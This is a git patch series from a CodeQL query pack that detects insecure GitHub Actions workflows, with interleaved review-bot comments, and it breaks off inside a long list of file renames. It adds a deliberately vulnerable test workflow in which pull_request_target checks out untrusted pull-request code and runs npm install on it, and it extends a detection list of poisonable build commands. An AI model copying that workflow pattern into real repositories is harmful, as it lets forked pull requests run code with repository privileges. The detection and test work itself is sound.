-
- core.info("Finished CodeQL analysis");
- } catch (error) {
- // Fail the workflow run if an error occurs
- if (error instanceof Error) core.setFailed(error.message);
- }
-}
-
-// eslint-disable-next-line @typescript-eslint/no-floating-promises
-run();
diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json
deleted file mode 100644
index c4b7762f9cd..00000000000
--- a/.github/action/tsconfig.json
+++ /dev/null
@@ -1,24 +0,0 @@ -{ - "$schema": "https://json.schemastore.org/tsconfig", - "compilerOptions": { - "target": "ES2022", - "module": "NodeNext", - "rootDir": "./src", - "moduleResolution": "NodeNext", - "baseUrl": "./", - "sourceMap": true, - "outDir": "./dist", - "noImplicitAny": true, - "esModuleInterop": true, - "forceConsistentCasingInFileNames": true, - "strict": true, - "skipLibCheck": true, - "newLine": "lf" - }, - "exclude": [ - "./dist", - "./node_modules", - "./__tests__", - "./coverage" - ] -} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml deleted file mode 100644 index 9bc5b787fea..00000000000 --- a/.github/workflows/build.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: Build and Compile Action - -on: - pull_request: - branches: ["master", "develop"] - workflow_dispatch: - -permissions: - contents: read - packages: read - pull-requests: read - -jobs: - action: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: dorny/paths-filter@v3 - id: changes - with: - filters: | - src: - - '.github/action/**' - - 'action.yml' - - - name: Run action - if: steps.changes.outputs.src == 'true' - uses: ./ - with: - token: ${{ secrets.GHCR_TOKEN }} diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml deleted file mode 100644 index a6b568f2bfb..00000000000 --- a/.github/workflows/copy-to-bughalla.yml +++ /dev/null 
@@ -1,34 +0,0 @@ -name: Copy to Bughalla - -on: - push: - branches: - - 'master' - -permissions: - contents: read - -jobs: - copy: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - - run: | - rm -rf .github/workflows/copy-to-bughalla.yml - git remote set-url --push origin git@github.com:bughalla/codeql-actions - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git add -v . - git commit -m 'Actions: Add patch' - - - name: Push changes - uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a - with: - repository: bughalla/codeql-actions - github_token: ${{ secrets.BUGHALLA_TOKEN }} - branch: ${{ github.ref }} - force: true diff --git a/action.yml b/action.yml deleted file mode 100644 index 151c909fb8b..00000000000 --- a/action.yml +++ /dev/null 
@@ -1,51 +0,0 @@ -name: "codeql-actions" -description: "CodeQL Pack for GitHub Actions and Workflows" - -inputs: - token: - description: GitHub Token - default: ${{ github.token }} - source-root: - description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: ${{ github.workspace }} - sarif-output: - description: "SARIF File Output" - default: "codeql-actions.sarif" - suite: - description: "CodeQL Suite to run" - default: "actions-code-scanning" - packs: - description: >- - Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not - specified, then the latest version of the pack is used. By default, this overrides the same setting in a - configuration file; prefix with "+" to use both sets of packs. - required: false - -runs: - using: 'composite' - steps: - - name: extpack contents - shell: bash - if: inputs.packs - env: - EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 - EXTPACK_NAME: local/workflow-models - run: | - echo "##[group] Workflow Models" - if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi - echo "##[endgroup]" - echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi - echo "##[endgroup]" - - - name: Scan workflows - shell: bash - env: - GITHUB_TOKEN: ${{ inputs.token }} - GH_TOKEN: ${{ inputs.token }} - INPUT_SOURCE-ROOT: ${{ inputs.source-root }} - INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} - INPUT_SUITE: ${{ inputs.suite }} - INPUT_PACKS: ${{ inputs.packs }} - run: | - node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/clean.sh b/clean.sh deleted file mode 100755 index e0458a639e3..00000000000 --- a/clean.sh +++ /dev/null @@ -1,2 +0,0 @@ -#! /bin/bash -find . -type d -name "*testproj*" -exec rm -r {} + From 6df70d1a455f67ce3a174ea0dda7ea9384fec8ad Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 23 Jun 2024 21:34:30 +0200 Subject: [PATCH 0343/1267] Do not consider priv events if runtime data is available --- ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +++++++--- .../CWE-829/.github/workflows/test3.yml | 41 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + 3 files changed, 58 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4864a80e54..da54833e9a6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -853,6 +853,14 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasRuntimeData() { + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") + ) + } + private predicate hasRuntimeWritePermissions() { // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | 
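Review bot: In `hasRuntimeData()` the job is matched with `name.trim().matches(this.getId() + "%")`, a prefix match whose pattern also treats any `_` or `%` inside the job id as a wildcard, so runtime rows recorded for a different job (`build_docs` when the job is `build`, for example) can make the predicate hold. Because a true result switches off the privileged-event fallback in `isPrivilegedExternallyTriggerable()`, an accidental match hides a finding rather than adding one. If the suffix wildcard exists for a reason this hunk does not show (matrix job names, say), compare on the exact id plus an explicit separator; otherwise use `name.trim() = this.getId()`. The unused `trigger`, `secrets_source` and `perms` variables can become `_` in the `workflowDataModel` call, and the predicate deserves a one-line QLDoc saying what counts as runtime data. `hasRuntimeWritePermissions()`, shown as trailing context, continues outside the hunk.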
@@ -885,15 +893,18 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { exists(EventImpl e | - // job is triggereable by an external user this.getATriggerEvent() = e and + // job is triggereable by an external user e.isExternallyTriggerable() and - // job is privileged (write access or access to secrets) + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not e.getName() = "pull_request" and ( - this.isPrivileged() and - not e.getName() = "pull_request" + // job is privileged (write access or access to secrets) + this.isPrivileged() or - not this.isPrivileged() and + // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + not this.hasRuntimeData() and e.isPrivileged() ) ) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml new file mode 100644 index 00000000000..d9aa2973e00 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml 
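Review bot: The fallback `not this.hasRuntimeData() and e.isPrivileged()` asks whether the job has any runtime row at all, not whether it has one for the event `e` bound at the top of the `exists`. `hasRuntimeData()` binds a `trigger` column and never compares it, so data collected for one trigger (a `push` run, say) would also suppress the privileged-by-default verdict for `pull_request_target` on the same job. I would pass the event through, e.g. `not this.hasRuntimeData(e.getName())`, with the predicate comparing its `trigger` column to that name; this assumes the column holds the event name, which the hunk does not show. The enclosing `JobImpl` class starts and ends outside the hunk.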
@@ -0,0 +1,41 @@ +name: "Test" +permissions: + actions: none + checks: none + contents: read + deployments: none + id-token: none + issues: none + discussions: none + packages: none + pages: none + pull-requests: read + repository-projects: none + security-events: none + statuses: none +on: + pull_request_target: + types: + - opened + - edited + - synchronize + +jobs: + main: + name: Test Pull Request + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: npm install + working-directory: scripts/github-actions/semantic-pull-request/ + - name: Lint PR Title + if: github.event_name == 'pull_request_target' + uses: actions/github-script@v7 + with: + script: | + const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request') + await verifyPullRequest({ context, core, github }) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce1..0ff47fd2c53 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
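Review bot: Only the no-runtime-data path is covered by this fixture: read-only `permissions:` plus `pull_request_target` is still reported, as the new row in `UntrustedCheckoutCritical.expected` shows. The behaviour the commit introduces, dropping the privileged-event assumption when `workflowDataModel` has a row for the job, has no fixture among the three files changed here. A second workflow with a matching runtime-data row and no expected alert would keep a later change to the matching logic from silently widening the suppression.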
@@ -4,5 +4,6 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From b5dfda27fdc7a39e14ff996f034015e4631159a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:24 +0200 Subject: [PATCH 0344/1267] Add cargo as poisonable step --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f80f09a32d8..b1d5269d44a 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,7 +23,7 @@ private string dangerousCommands() { "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run" + "poetry run", "cargo " ] } From 24d69f2ee80f0daab0a9ecbd13867046e61f0b6c Mon Sep 17 00:00:00 2001 
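Review bot: The new `"cargo "` entry in `dangerousCommands()` arrives with no fixture and no comment on why it is poisonable; the commit touches only this file. A line such as `// cargo build/test/run compile and execute build.rs and proc-macros from the checked-out tree` next to it would record the reasoning, and a workflow fixture with a `cargo build` step after an untrusted checkout would pin the detection. Unlike `"^ant "`, the entry is unanchored, so whether text like `echo cargo ` also matches depends on how the list is applied, which is outside the hunk along with the start of `dangerousCommands()`.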
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:35 +0200 Subject: [PATCH 0345/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 70edc1b0574..abc56e6a090 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.2 +version: 0.1.3 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 89df5ee8797..74678b945ca 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.2 +version: 0.1.3 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc8173239e1ba10b9ed2e4f3b5dee76e3854b0cf Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 09:47:43 +0200 Subject: [PATCH 0346/1267] Move configuration to MaD files --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 74 +++++++++++++++++++ .../actions/config/ConfigExtensions.qll | 41 ++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 45 ----------- .../codeql/actions/dataflow/FlowSources.qll | 3 +- .../internal/ExternalFlowExtensions.qll | 22 ------ .../security/ArtifactPoisoningQuery.qll | 4 +- .../actions/security/CachePoisoningQuery.qll | 2 +- .../actions/security/PoisonableSteps.qll | 62 ++++------------ .../actions/security/SelfHostedQuery.qll | 2 +- .../context_event_map.yml} | 25 +------ .../config/externally_triggereable_events.yml | 18 +++++ ql/lib/ext/config/poisonable_steps.yml | 55 ++++++++++++++ ql/lib/ext/config/workflow_runtime_data.yml | 9 +++ .../8398a7_action-slack.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../akhileshns_heroku-deploy.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../anchore_sbom-action.model.yml | 0 .../anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../{ => manual}/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 .../aszc_change-string-case-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../{ => manual}/azure_powershell.model.yml | 0 .../bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 
.../cachix_cachix-action.model.yml | 0 .../{ => manual}/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../{ => manual}/endbug_latest-tag.model.yml | 0 .../expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../gabrielbb_xvfb-action.model.yml | 0 .../game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../haya14busa_action-cond.model.yml | 0 .../hexlet_project-action.model.yml | 0 .../ilammy_msvc-dev-cmd.model.yml | 0 .../{ => manual}/ilammy_setup-nasm.model.yml | 0 .../{ => manual}/imjohnbo_issue-bot.model.yml | 0 .../iterative_setup-cml.model.yml | 0 .../iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 
.../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../jsdaniell_create-json.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../jwalton_gh-ecr-push.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../magefile_mage-action.model.yml | 0 .../maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../marocchino_on_artifact.model.yml | 0 .../mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../microsoft_setup-msbuild.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../{ => manual}/msys2_setup-msys2.model.yml | 0 .../mxschmitt_action-tmate.model.yml | 0 .../mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../{ => manual}/nanasess_setup-php.model.yml | 0 .../{ => manual}/nick-fields_retry.model.yml | 0 .../octokit_graphql-action.model.yml | 0 .../octokit_request-action.model.yml | 0 .../olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../{ => manual}/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../reggionick_s3-deploy.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../ros-tooling_setup-ros.model.yml | 0 .../{ => 
manual}/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 .../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../{ => manual}/tibdex_backport.model.yml | 0 .../timheuer_base64-to-file.model.yml | 0 .../tj-actions_branch-names.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../tzkhan_pr-update-action.model.yml | 0 .../veracode_veracode-sca.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../webfactory_ssh-agent.model.yml | 0 .../xt0rted_slash-command-action.model.yml | 0 .../zaproxy_action-baseline.model.yml | 0 .../zaproxy_action-full-scan.model.yml | 0 ql/lib/qlpack.yml | 6 +- ql/test/library-tests/workflowenum.ql | 2 +- 150 files changed, 224 insertions(+), 148 deletions(-) create mode 100644 ql/lib/codeql/actions/config/Config.qll create mode 100644 ql/lib/codeql/actions/config/ConfigExtensions.qll rename ql/lib/ext/{workflow-models/workflow-models.yml => config/context_event_map.yml} (78%) create mode 100644 ql/lib/ext/config/externally_triggereable_events.yml create mode 100644 ql/lib/ext/config/poisonable_steps.yml create mode 100644 ql/lib/ext/config/workflow_runtime_data.yml rename ql/lib/ext/{ => manual}/8398a7_action-slack.model.yml (100%) rename ql/lib/ext/{ => manual}/SonarSource_sonarcloud-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/actions_github-script.model.yml (100%) rename ql/lib/ext/{ => manual}/ahmadnassri_action-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/akhileshns_heroku-deploy.model.yml (100%) rename ql/lib/ext/{ => 
manual}/amannn_action-semantic-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_sbom-action.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_scan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/andresz1_size-limit-action.model.yml (100%) rename ql/lib/ext/{ => manual}/android-actions_setup-android.model.yml (100%) rename ql/lib/ext/{ => manual}/apple-actions_import-codesign-certs.model.yml (100%) rename ql/lib/ext/{ => manual}/asdf-vm_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_read-json-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_regex-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aszc_change-string-case-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aws-actions_configure-aws-credentials.model.yml (100%) rename ql/lib/ext/{ => manual}/axel-op_googlejavaformat-action.model.yml (100%) rename ql/lib/ext/{ => manual}/azure_powershell.model.yml (100%) rename ql/lib/ext/{ => manual}/bahmutov_npm-install.model.yml (100%) rename ql/lib/ext/{ => manual}/blackducksoftware_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bobheadxi_deployments.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-breaking-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-setup-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cachix_cachix-action.model.yml (100%) rename ql/lib/ext/{ => manual}/changesets_action.model.yml (100%) rename ql/lib/ext/{ => manual}/cloudflare_wrangler-action.model.yml (100%) rename ql/lib/ext/{ => manual}/coursier_cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-chocolatey.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-import-gpg.model.yml (100%) rename ql/lib/ext/{ => manual}/csexton_release-asset-action.model.yml (100%) rename ql/lib/ext/{ => 
manual}/cycjimmy_semantic-release-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cypress-io_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/dailydotdev_action-devcard.model.yml (100%) rename ql/lib/ext/{ => manual}/danielpalme_reportgenerator-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/daspn_private-actions-checkout.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-ansible-playbook.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/delaguardo_setup-clojure.model.yml (100%) rename ql/lib/ext/{ => manual}/determinatesystems_magic-nix-cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/docker-practice_actions-setup-docker.model.yml (100%) rename ql/lib/ext/{ => manual}/docker_build-push-action.model.yml (100%) rename ql/lib/ext/{ => manual}/endbug_latest-tag.model.yml (100%) rename ql/lib/ext/{ => manual}/expo_expo-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/firebaseextended_action-hosting-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/frabert_replace-string-action.model.yml (100%) rename ql/lib/ext/{ => manual}/franzdiebold_github-env-vars-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gabrielbb_xvfb-action.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-builder.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-test-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/gautamkrishnar_blog-post-workflow.model.yml (100%) rename ql/lib/ext/{ => manual}/getsentry_action-release.model.yml (100%) rename ql/lib/ext/{ => manual}/github_codeql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/go-semantic-release_action.model.yml (100%) rename ql/lib/ext/{ => manual}/golangci_golangci-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gonuit_heroku-docker-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/goreleaser_goreleaser-action.model.yml (100%) rename 
ql/lib/ext/{ => manual}/gr2m_create-or-update-pull-request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gradle_gradle-build-action.model.yml (100%) rename ql/lib/ext/{ => manual}/haya14busa_action-cond.model.yml (100%) rename ql/lib/ext/{ => manual}/hexlet_project-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_msvc-dev-cmd.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_setup-nasm.model.yml (100%) rename ql/lib/ext/{ => manual}/imjohnbo_issue-bot.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-cml.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-dvc.model.yml (100%) rename ql/lib/ext/{ => manual}/jamesives_github-pages-deploy-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jitterbit_get-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/johnnymorganz_stylua-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jsdaniell_create-json.model.yml (100%) rename ql/lib/ext/{ => manual}/jurplel_install-qt-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jwalton_gh-ecr-push.model.yml (100%) rename ql/lib/ext/{ => manual}/khan_pull-request-comment-trigger.model.yml (100%) rename ql/lib/ext/{ => manual}/larsoner_circleci-artifacts-redirector-action.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-lua.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-luarocks.model.yml (100%) rename ql/lib/ext/{ => manual}/lucasbento_auto-close-issues.model.yml (100%) rename ql/lib/ext/{ => manual}/mad9000_actions-find-and-replace-string.model.yml (100%) rename ql/lib/ext/{ => manual}/magefile_mage-action.model.yml (100%) rename ql/lib/ext/{ => manual}/maierj_fastlane-action.model.yml (100%) rename ql/lib/ext/{ => manual}/manusa_actions-setup-minikube.model.yml (100%) rename ql/lib/ext/{ => manual}/marocchino_on_artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/mattdavis0351_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/meteorengineer_setup-meteor.model.yml 
(100%) rename ql/lib/ext/{ => manual}/metro-digital_setup-tools-for-waas.model.yml (100%) rename ql/lib/ext/{ => manual}/microsoft_setup-msbuild.model.yml (100%) rename ql/lib/ext/{ => manual}/mishakav_pytest-coverage-comment.model.yml (100%) rename ql/lib/ext/{ => manual}/mr-smithers-excellent_docker-build-push.model.yml (100%) rename ql/lib/ext/{ => manual}/msys2_setup-msys2.model.yml (100%) rename ql/lib/ext/{ => manual}/mxschmitt_action-tmate.model.yml (100%) rename ql/lib/ext/{ => manual}/mymindstorm_setup-emsdk.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-chromedriver.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-php.model.yml (100%) rename ql/lib/ext/{ => manual}/nick-fields_retry.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_graphql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/olafurpg_setup-scala.model.yml (100%) rename ql/lib/ext/{ => manual}/paambaati_codeclimate-action.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-evans_create-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-murray_issue-body-parser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/plasmicapp_plasmic-action.model.yml (100%) rename ql/lib/ext/{ => manual}/preactjs_compressed-size-action.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_flake8.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_py-dependency-install.model.yml (100%) rename ql/lib/ext/{ => manual}/pyo3_maturin-action.model.yml (100%) rename ql/lib/ext/{ => manual}/reactivecircus_android-emulator-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/redhat-plumbers-in-action_download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/reggionick_s3-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/renovatebot_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/roots_issue-closer-action.model.yml (100%) rename ql/lib/ext/{ => 
manual}/ros-tooling_setup-ros.model.yml (100%) rename ql/lib/ext/{ => manual}/ruby_setup-ruby.model.yml (100%) rename ql/lib/ext/{ => manual}/salsify_action-detect-and-tag-new-version.model.yml (100%) rename ql/lib/ext/{ => manual}/sergeysova_jq-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shallwefootball_upload-s3-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shogo82148_actions-setup-perl.model.yml (100%) rename ql/lib/ext/{ => manual}/skitionek_notify-microsoft-teams.model.yml (100%) rename ql/lib/ext/{ => manual}/snow-actions_eclint.model.yml (100%) rename ql/lib/ext/{ => manual}/stackhawk_hawkscan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/step-security_harden-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/suisei-cn_actions-download-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tibdex_backport.model.yml (100%) rename ql/lib/ext/{ => manual}/timheuer_base64-to-file.model.yml (100%) rename ql/lib/ext/{ => 